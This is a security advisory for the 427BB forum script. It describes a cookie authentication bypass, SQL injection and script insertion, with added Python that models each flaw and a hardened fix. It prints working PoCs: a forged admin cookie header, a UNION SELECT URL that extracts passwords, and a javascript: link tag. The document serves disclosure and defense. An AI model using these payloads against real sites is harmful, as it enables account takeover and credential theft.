Cookie Auth Bypass, SQL Injections, XSS in 427BB
Summary
- Vulnerability
- Cookie Auth Bypass, SQL Injections, XSS in 427BB
- Discovered
- 2006.01.07
- Last Update
- n/a
- ID
- EV0018
- CVE
- CVE-2006-0153 CVE-2006-0154 CVE-2006-0155
- Risk Level
- high
- Type
- Multiple Vulnerabilities
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- 427BB (http://sourceforge.net/projects/fourtwosevenbb)
- Version
- checked: 2.2 and 2.2.1
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the 427BB (http://sourceforge.net/projects/fourtwosevenbb) forum script.
1. Authentication bypass using modified cookie values.
Vulnerable scripts: login.php, getvars.php
To treat a visitor as a logged-in user, the forum scripts check only three cookie values:
- username
- authenticated
- usertype
No password comparison is made, so anyone who sets these three cookies is accepted as that user with that usertype.
2. Multiple SQL injection vulnerabilities.
For example:
Vulnerable script: showthread.php
The $ForumID variable is not sanitized before being used in a SQL query, so arbitrary SQL code can be injected into that query.
3. Arbitrary script code insertion is possible when posting a message containing a URL.
Vulnerable script: posts.php
Condition: a visitor needs to click the link.
PoC/Exploit
1. Authentication bypass using modified cookie values.
No password needed; send the following cookie header:
Cookie: username=admin; authenticated=1; usertype=admin
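The following is an added example (not code from 427BB or from the advisory author) that models the flaw described above and a hardened replacement. The vulnerable function reproduces the logic the advisory describes: it trusts username, authenticated and usertype straight from the cookie. The hardened version issues an HMAC-signed session cookie only after a password check and takes usertype from the server-side user record. The user table, the cookie name "session", the SHA-256 password hashing and the secret key are all constructed for the example; a real system would use a salted password hash such as bcrypt or argon2.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Optional

# Constructed stand-in for the forum's user records (assumption, not 427BB's schema).
USERS = {
    "admin": {"pw_hash": hashlib.sha256(b"correct horse").hexdigest(), "usertype": "admin"},
    "alice": {"pw_hash": hashlib.sha256(b"alice-pw").hexdigest(), "usertype": "user"},
}

# Per-process secret; in a real deployment this would be loaded from configuration.
SERVER_KEY = secrets.token_bytes(32)


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Parse the value of a Cookie: request header into a dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_whoami(cookies: Dict[str, str]) -> Optional[dict]:
    """Models the advisory's flaw: identity and role come from the cookie alone."""
    if cookies.get("authenticated") != "1":
        return None
    return {"username": cookies.get("username"), "usertype": cookies.get("usertype")}


def _sign(username: str) -> str:
    mac = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}:{mac}"


def login(username: str, password: str) -> Optional[str]:
    """Return a signed session token only if the password matches."""
    user = USERS.get(username)
    if user is None:
        return None
    candidate = hashlib.sha256(password.encode()).hexdigest()
    if not hmac.compare_digest(user["pw_hash"], candidate):
        return None
    return _sign(username)


def hardened_whoami(cookies: Dict[str, str]) -> Optional[dict]:
    """Accept only a token whose MAC verifies; role is read from the server side."""
    token = cookies.get("session")
    if not token or ":" not in token:
        return None
    username = token.rsplit(":", 1)[0]
    if not hmac.compare_digest(_sign(username), token):
        return None
    user = USERS.get(username)
    if user is None:
        return None
    # usertype is never taken from the cookie
    return {"username": username, "usertype": user["usertype"]}


# The advisory's PoC cookie header, parsed as the forum would receive it.
FORGED = parse_cookie_header("username=admin; authenticated=1; usertype=admin")
```

With the forged cookies, vulnerable_whoami returns an admin identity while hardened_whoami returns None; a token issued to alice still cannot be re-labelled as admin because the MAC covers the username.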
2. SQL Injection Example.
The attacker needs to be logged in as a registered user.
http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
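The following is an added example (not 427BB code) that runs the advisory's UNION payload against an in-memory SQLite database to show why unsanitized $ForumID is a full data leak, and a parameterized replacement that rejects it. The table layout (prefPosts with four columns, prefPersonal with UserName and Password) is constructed for the example; the real script's column names are not given by the advisory, whose payload spells the second column "Passwrod".

```python
import sqlite3
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed schema standing in for the forum tables (assumption).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE prefPosts (ForumID INTEGER, ThreadID INTEGER, UserName TEXT, Body TEXT);
        CREATE TABLE prefPersonal (UserName TEXT, Password TEXT);
        INSERT INTO prefPosts VALUES (1, 10, 'alice', 'hello');
        INSERT INTO prefPersonal VALUES ('admin', 'sekrit-hash'), ('alice', 'alice-hash');
        """
    )
    return con


def forum_id_from_url(url: str) -> str:
    """Extract the raw ForumID query parameter, URL-decoded, as PHP's $_GET would."""
    return parse_qs(urlsplit(url).query)["ForumID"][0]


def showthread_vulnerable(con: sqlite3.Connection, forum_id: str) -> List[Tuple]:
    """Models the flaw: the parameter is concatenated into the query text."""
    sql = "SELECT ForumID, ThreadID, UserName, Body FROM prefPosts WHERE ForumID=" + forum_id
    return con.execute(sql).fetchall()


def showthread_hardened(con: sqlite3.Connection, forum_id: str) -> List[Tuple]:
    """Type-check the value and bind it as a parameter; the payload never reaches SQL."""
    try:
        fid = int(forum_id)
    except ValueError:
        raise ValueError("ForumID must be an integer")
    sql = "SELECT ForumID, ThreadID, UserName, Body FROM prefPosts WHERE ForumID=?"
    return con.execute(sql, (fid,)).fetchall()


# The advisory's PoC URL, with the assumed column name Password (constructed host/path).
POC_URL = (
    "http://host/bb427/showthread.php?ForumID=999%20union%20select"
    "%20UserName,Password,null,null%20from%20prefPersonal"
)
```

Against the vulnerable function the payload returns every username and password hash in prefPersonal padded with NULLs to match the four-column post query; the hardened function raises before any SQL runs, and a legitimate ForumID of 1 still returns the post.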
3. Arbitrary script code insertion.
Post a new message with the following message text:
[url=javascript:alert(xss)]clickme[/url]
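The following is an added example (not 427BB code) of how the [url=...] tag turns into the described script insertion, and how a renderer should handle it. The vulnerable renderer copies the tag argument into href unchanged; the hardened one keeps only http and https links, strips the control characters browsers ignore inside a scheme, and HTML-escapes both the href and the link text. The BBCode regex and the rel="nofollow" attribute are this example's own choices, not 427BB's posts.php logic.

```python
import html
import re
from urllib.parse import urlsplit

# Minimal [url=target]label[/url] matcher; constructed for this example.
URL_TAG = re.compile(r"\[url=(.+?)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
SAFE_SCHEMES = {"http", "https"}


def render_vulnerable(text: str) -> str:
    """Models the flaw: any scheme, including javascript:, ends up in href."""
    return URL_TAG.sub(lambda m: f'<a href="{m.group(1)}">{m.group(2)}</a>', text)


def is_safe_url(url: str) -> bool:
    """Allow only absolute http(s) URLs with a host.

    Browsers drop ASCII control characters and whitespace when parsing the
    scheme, so 'java\\tscript:' still executes; remove them before checking.
    A scheme-less value (e.g. entity-encoded 'javascript') is rejected too.
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", url)
    parts = urlsplit(cleaned)
    return parts.scheme.lower() in SAFE_SCHEMES and bool(parts.netloc)


def render_hardened(text: str) -> str:
    """Emit a link only for safe targets; otherwise keep the label as plain text."""
    def repl(m: re.Match) -> str:
        url, label = m.group(1), m.group(2)
        if not is_safe_url(url):
            return html.escape(label)
        return f'<a href="{html.escape(url, quote=True)}" rel="nofollow">{html.escape(label)}</a>'
    return URL_TAG.sub(repl, text)


# The advisory's PoC message text.
POC_MESSAGE = "[url=javascript:alert(xss)]clickme[/url]"
```

Escaping the attribute also neutralises the entity-encoded variant: an input of &#106;avascript: has no valid scheme, so it is rejected, and even if it were passed through, its ampersand would be emitted as &amp; rather than decoded by the browser.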
Solution.
A solution for "Cookie Auth Bypass, SQL Injections, XSS in 427BB" is not available. Check the vendor's website for updates.